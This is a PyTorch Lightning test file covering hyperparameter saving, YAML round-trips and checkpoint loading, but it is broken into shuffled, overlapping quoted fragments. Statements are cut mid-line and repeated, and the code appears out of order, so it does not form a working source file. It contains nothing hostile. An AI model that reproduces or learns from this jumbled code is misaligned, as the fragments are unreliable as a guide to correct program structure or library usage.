cls(running_arg=123) assert model.hparams.running_arg", "== 179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if", "we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99", "cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel,", "and assign \"\"\" # define model class LocalModel(EvalModelTemplate): def __init__(self,", "= cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate()", "take regular args and assign \"\"\" # define model class", "import cloudpickle import pytest import torch from fsspec.implementations.local import LocalFileSystem", "def __init__(self, hparams): super().__init__() self.hparams = hparams # ------------------------- #", "that we can overwrite whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path,", "model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams class", "def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml", "the checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)", "LocalFileSystem from omegaconf import OmegaConf, Container from torch.nn import functional", "Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we can overwrite whatever", "PyTorch Lightning team. # # Licensed under the Apache License,", "arg1 # arg2 intentionally not set arg1 = 'overwritten' local_var", "**kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def", "self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test", "at the end. \"\"\" def __init__(self, arg1, arg2, *args, **kwargs):", "object with explicit setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams", "max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an", "LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only", "object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\"", "+ 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir):", "super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run standard test", "raw_checkpoint_path) # verify that model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path)", "the initial hparams, no other runtime change allowed\"\"\" model =", "def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify we can", "assert model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert model.hparams.running_arg ==", "valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters()", "super().__init__(*args, **kwargs) # this is intentionally here at the end", "in model.hparams assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] == 2", "test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run", "verify that model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert", "@pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export", "extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert", "verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model)", "None # pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams =", "= Namespace(abc=42) assert model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir,", "\"*args\" and \"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs): #", "loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path)", "def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14,", "assert 'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams):", "import DataLoader from pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import", "**more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args,", "dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls,", "this is intentionally here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst,", "OR CONDITIONS OF ANY KIND, either express or implied. #", "forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb): x,", "trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg')", "arg1 = 'overwritten' local_var = 1234 super().__init__(*args, **kwargs) # this", "pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x + 1),", "we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) #", "# ]) # def test_single_config_models(tmpdir, cls, config): # \"\"\" Test", "the License is distributed on an \"AS IS\" BASIS, #", "model can take implicit args and assign \"\"\" # define", "dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml,", "assert ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad ==", "__init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\"", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads correctly model", "model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model", "_ = a.hparams def test2(self): test_outside() test_outside() A().test2() A().test() class", "end. \"\"\" def __init__(self, arg1, arg2, *args, **kwargs): self.argument1 =", "batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader)", "10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch,", "the super class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs)", "model.hparams # test_arg2 is not registered in class init return", "def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests for the existence", "trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only valid", "BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take", "def test_omega_conf_hparams(tmpdir, cls): # init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4,", "law or agreed to in writing, software # distributed under", "whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size ==", "from pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml", "123 model.hparams.running_arg = -1 assert model.hparams.running_arg == -1 model.hparams =", "at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def", "model should accept hparams and init in the super class", "OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))),", "# define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__()", "== 'overwritten' assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ #", "foo='bar', pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs) assert not", "may obtain a copy of the License at # #", "data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert", "obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')),", "checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)", "init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model =", "cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model", "may not use this file except in compliance with the", "modules are always nn.Module a = MyModule() assert isinstance(a, torch.nn.Module)", "that the checkpoint saved the correct values # trainer =", "(SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel,", "this file except in compliance with the License. # You", "= _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument", "a = MyModule() _ = a.hparams class A: def test(self):", "in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model", "= LocalModel(test_arg=14, test_arg2=90) # test proper property assignments assert model.hparams.test_arg", "# arg2 intentionally not set arg1 = 'overwritten' local_var =", "== pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an", "model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model", "Lightning team. # # Licensed under the Apache License, Version", "verify that the checkpoint saved the correct values trainer =", "cls): # init model model = cls(hparams={'test_arg': 14}) # run", "# # Licensed under the Apache License, Version 2.0 (the", "**kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args,", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a = MyModule() _", "= torch.nn.Linear(28 * 28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0),", "model can take an object with explicit setter \"\"\" def", "Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify that we can", "super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self,", "in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that model", "raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads", "constructor \"\"\" # model = cls(config) # # # no", "team. # # Licensed under the Apache License, Version 2.0", "import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a", "def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with", "only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size)", "want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99 def", "(AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ])", "class takes positional arg, subclass takes varargs. \"\"\" hparams =", "MyModule() _ = a.hparams def test2(self): test_outside() test_outside() A().test2() A().test()", "def __init__(self, arg1, arg2, *args, **kwargs): self.argument1 = arg1 #", "an object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate):", "keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__()", "nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml)", "== -1 model.hparams = Namespace(abc=42) assert model.hparams.abc == 42 trainer", "= UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me'", "max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model,", "x: x + 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters()", "# verify that we can overwrite the property model3 =", "or implied. # See the License for the specific language", "= F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss': loss}} def", "is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\"", "that has an attribute that cannot be pickled. \"\"\" def", "def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90)", "can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make", "it cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams", "_ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model =", "LocalModel(test_arg=14, test_arg2=90) # test proper property assignments assert model.hparams.test_arg ==", "_run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) #", "end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\"", "argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters()", "= raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]", "model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg ==", "run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2", "\"\"\" A model that has unconventional names for \"self\", \"*args\"", "14}) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\",", "correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model,", "my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model", "that only the arguments are collected and not local variables.", "you do it, it should be assigned # assert model.hparams.my_arg", "= Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams", "*args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class", "model that has an attribute that cannot be pickled. \"\"\"", "import AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel class", "__init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10) def forward(self,", "return {'loss': loss, 'log': {'train_loss': loss}} def test_step(self, batch, batch_nb):", "__init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1", "tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that", "= os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x in raw_checkpoint_paths if", "model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1)", "end. \"\"\" def __init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs)", "# (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), #", "test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2' not in model.hparams", "**kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional", "['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify we", "= OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams,", "raw_checkpoint_paths if '.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0]", "intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self,", "pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model", "[SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model model =", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the", "load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class", "test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss()", "def test_namespace_hparams(tmpdir, cls): # init model model = cls(hparams=Namespace(test_arg=14)) #", "_raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace'", "assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams", "subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel):", "loss, 'log': {'train_loss': loss}} def test_step(self, batch, batch_nb): x, y", "= torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] =", "save_hparams_to_yaml(path_yaml, Namespace(**hparams)) assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert load_hparams_from_yaml(path_yaml)", "del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] # save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) #", "Loading this model should accept hparams and init in the", "== 14 assert isinstance(model2.hparams, hparam_type) if try_overwrite: # verify that", "== 42 # # # verify that the checkpoint saved", "# this is intentionally here at the end class LocalVariableModelSuperFirst(EvalModelTemplate):", "@pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel,", "# make sure PL modules are always nn.Module a =", "the checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2,", "def __init__(self): super().__init__() class SimpleNoArgsModel(LightningModule): def __init__(self): super().__init__() self.l1 =", "checkpoint saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path)", "the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) raw_checkpoint_path", "can overwrite whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert", "def test_dict_hparams(tmpdir, cls): # init model model = cls(hparams={'test_arg': 14})", "intentionally here at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\" This model", "test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning,", "other_arg=300, **more_kwargs): # intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class", "F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss': loss}} def test_step(self,", "in writing, software # distributed under the License is distributed", "# config specific tests assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir):", "overwrite the property model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg ==", "== hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class NoArgsSubClassEvalModel(EvalModelTemplate):", "saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key]", "local variables. \"\"\" model = cls(arg1=1, arg2=2) assert 'local_var' not", "an object with explicit setter \"\"\" def __init__(self, hparams): super().__init__()", "test_arg2 is not registered in class init return raw_checkpoint_path #", "LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model =", "model = cls(config) # # # no matter how you", "Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model) # make sure the raw checkpoint", "# verify that the checkpoint saved the correct values trainer", "@pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir,", "model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf)", "class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args, subclass_arg=1200, **kwargs):", "# verify that model loads correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert", "x, y = batch loss = F.cross_entropy(self(x), y) return {'loss':", "License is distributed on an \"AS IS\" BASIS, # WITHOUT", "not in model.hparams assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] ==", "License, Version 2.0 (the \"License\"); # you may not use", "whatever we want raw_checkpoint_path = _raw_checkpoint_path(trainer) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99)", "__init__(self, **kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__()", "MyModule(LightningModule): def forward(self): ... # make sure PL modules are", "class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters()", "how you do it, it should be assigned # assert", "self.save_hyperparameters() # this is intentionally here at the end @pytest.mark.parametrize(\"cls\",", "make sure PL modules are always nn.Module a = MyModule()", "LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=120) # config specific tests assert", "# ------------------------- # STANDARD TESTS # ------------------------- def _run_standard_hparams_test(tmpdir, model,", "intentionally not set arg1 = 'overwritten' local_var = 1234 super().__init__(*args,", "== 32 model = cls(batch_size=179, **extra_args) assert model.hparams.batch_size == 179", "DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\",", "trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def", "assert isinstance(model.hparams, Container) # run standard test suite raw_checkpoint_path =", "# verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model)", "the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model loads correctly", "super().__init__(*args, **kwargs) self.save_hyperparameters() @pytest.mark.parametrize(\"cls\", [ EvalModelTemplate, SubClassEvalModel, SubSubClassEvalModel, AggSubClassEvalModel, UnconventionalArgsEvalModel,", "only the arguments are collected and not local variables. \"\"\"", "save back the checkpoint torch.save(raw_checkpoint, raw_checkpoint_path) # verify that model", "the License for the specific language governing permissions and #", "allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg == 123 model.hparams.running_arg =", "UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed", "AggSubClassEvalModel): assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container)", "= _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint assert", "= load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def __init__(self,", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in", "download=True), batch_size=32) trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes", "regular args and assign \"\"\" # define model class LocalModel(EvalModelTemplate):", "saved the properties raw_checkpoint_path = _raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) assert", "model.hparams.test_arg == 14 # verify we can train trainer =", "assert isinstance(model.hparams.my_loss, torch.nn.CosineEmbeddingLoss) if isinstance(model, DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert", "that a model can take implicit args and assign \"\"\"", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "arguments passed into the constructor \"\"\" # model = cls(config)", "the end. \"\"\" def __init__(self, arg1, arg2, *args, **kwargs): self.argument1", "correctly model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams,", "test_namespace_hparams(tmpdir, cls): # init model model = cls(hparams=Namespace(test_arg=14)) # run", "== 2 # @pytest.mark.parametrize(\"cls,config\", [ # (SaveHparamsModel, Namespace(my_arg=42)), # (SaveHparamsModel,", "**kwargs): super().__init__() self.save_hyperparameters() class RuntimeParamChangeModelAssign(BoringModel): def __init__(self, **kwargs): super().__init__() self.hparams", "variables. \"\"\" model = cls(arg1=1, arg2=2) assert 'local_var' not in", "\"self\", \"*args\" and \"**kwargs\". \"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs):", "torch.nn.Linear(28 * 28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1)))", "__init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a", "this is intentionally here at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\"", "def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb):", "DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify", "that the model automatically saves the arguments passed into the", "def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x", "# def test_single_config_models(tmpdir, cls, config): # \"\"\" Test that the", "pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams because it cannot be", "A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args,", "# distributed under the License is distributed on an \"AS", "assign \"\"\" # define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg,", "# Unless required by applicable law or agreed to in", "-1 assert model.hparams.running_arg == -1 model.hparams = Namespace(abc=42) assert model.hparams.abc", "# init model model = cls(hparams={'test_arg': 14}) # run standard", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def", "= MyModule() _ = a.hparams class A: def test(self): a", "the existence of an arg 'test_arg=14' \"\"\" hparam_type = type(model.hparams)", "cls.load_from_checkpoint(raw_checkpoint_path) assert model2.hparams.test_arg == 14 assert isinstance(model2.hparams, hparam_type) if try_overwrite:", "= Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we can overwrite", "\"\"\" This model has the _auto_collect_arguments() call at the end.", "tests assert model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that", "Container from torch.nn import functional as F 